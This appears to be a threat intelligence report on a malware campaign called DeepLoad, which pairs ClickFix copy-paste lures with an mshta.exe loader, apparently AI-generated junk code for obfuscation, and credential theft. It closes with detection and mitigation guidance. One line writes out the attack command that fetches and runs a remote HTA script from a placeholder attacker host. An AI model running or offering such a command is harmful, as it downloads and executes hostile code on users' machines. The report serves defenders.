Executive Summary

Security researchers at ReliaQuest have uncovered a new malware campaign, named DeepLoad, that represents a significant evolution in threat actor techniques. The campaign combines the increasingly popular "ClickFix" social engineering method for initial execution with a PowerShell loader that is heavily obfuscated with what is believed to be AI-generated code. This combination makes the malware exceptionally difficult to detect using traditional, signature-based security tools. The fileless nature of the attack, which primarily operates in memory, allows it to bypass many static defenses, highlighting the critical need for behavioral analysis and advanced endpoint detection to counter this emerging threat.

Threat Overview

The DeepLoad attack begins with a social engineering lure. The threat actor uses the "ClickFix" technique, where a user is convinced to copy and paste a command into a command-line interface like Windows Terminal or PowerShell. This is often disguised as a necessary step for a security check, software update, or to access content.

In this campaign, the command executed mshta.exe, a legitimate Windows binary, to run a script hosted on a remote, attacker-controlled server. Using mshta.exe is a common living-off-the-land (LotL) technique to bypass application whitelisting.

mshta.exe http://attacker.server/malicious.hta

The downloaded script is a PowerShell loader, but it is heavily obfuscated. It contains thousands of lines of nonsensical code—random variable assignments, useless functions, and complex logic that does nothing. ReliaQuest researchers assess that the volume and consistency of this junk code strongly suggest it was generated by an AI model to act as camouflage, hiding the few lines of truly malicious code within the noise.

Technical Analysis

• Initial Access & Execution: The attack uses social engineering (T1566 - Phishing) to deliver the ClickFix instructions. The user's action of running the command constitutes T1204.002 - User Execution. The use of mshta.exe is a specific sub-technique, T1218.005 - System Binary Proxy Execution: Mshta.
• Defense Evasion: This is where DeepLoad excels. The primary evasion technique is T1027 - Obfuscated Files or Information. The use of AI to generate vast amounts of junk code is an advanced form of this, designed to defeat static analysis engines and overwhelm human analysts. The attack is also fileless, as the payload is executed in memory via PowerShell (T1059.001 - PowerShell), avoiding writing malicious files to disk.
• Credential Access: The ultimate goal of the deobfuscated PowerShell payload is to steal credentials, likely using modules like Mimikatz or by targeting credentials stored in memory or browser data stores (T1555 - Credentials from Password Stores).

The use of AI to generate obfuscation is a game-changer. It allows attackers to create a unique, polymorphic loader for each victim with minimal effort, rendering signature-based detection almost useless. Security tools must evolve to focus on the script's behavior, not its structure.

Impact Assessment

• High Evasion Rate: DeepLoad's combination of techniques gives it a high probability of bypassing traditional antivirus and even some EDR solutions, leading to undetected infections.
• Credential Compromise: Successful execution can lead to the theft of user and administrative credentials, giving attackers a foothold in the network to move laterally, exfiltrate data, or deploy ransomware.
• Increased Analyst Workload: The heavily obfuscated scripts are time-consuming for security analysts to reverse-engineer, delaying incident response and understanding of the threat.

Cyber Observables for Detection

• Parent-Child Process Relationships: Monitor for mshta.exe spawning a powershell.exe process. This is a highly suspicious process chain that warrants investigation.
• PowerShell Script Block Logging: Enable PowerShell Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103). Even if the script is obfuscated on disk, the deobfuscated code may be logged as it is executed in memory.
• Network Connections from Proxy Binaries: Alert on network connections made by binaries like mshta.exe to external, uncategorized URLs.

Detection & Response

• Behavioral Analysis: This is the key to detection. Deploy an EDR solution that monitors for suspicious behaviors, such as a legitimate Windows binary (mshta.exe) downloading and executing code from the internet, or PowerShell attempting to access the LSASS process memory. This aligns with D3FEND's Process Analysis.
• Enhanced Logging: Ensure comprehensive logging is enabled, particularly for PowerShell and command-line activity. These logs are essential for hunting for and investigating fileless attacks.
• User Training: As with the Infiniti Stealer, user education is critical. Users must be trained to never copy and paste commands from untrusted sources into a terminal or PowerShell window.

Mitigation

• Application Control: Use application control solutions like Windows Defender Application Control (WDAC) to restrict the execution of scripts and binaries. A properly configured policy can block unsigned PowerShell scripts from running.
• Attack Surface Reduction (ASR): Enable ASR rules on Windows endpoints. The rule "Block all Office applications from creating child processes" can prevent some initial delivery vectors, and "Block execution of potentially obfuscated scripts" can directly counter this threat.
• PowerShell Constrained Language Mode: Deploying PowerShell in Constrained Language Mode can significantly limit the capabilities of malicious scripts, preventing them from accessing sensitive Win32 APIs needed for credential theft.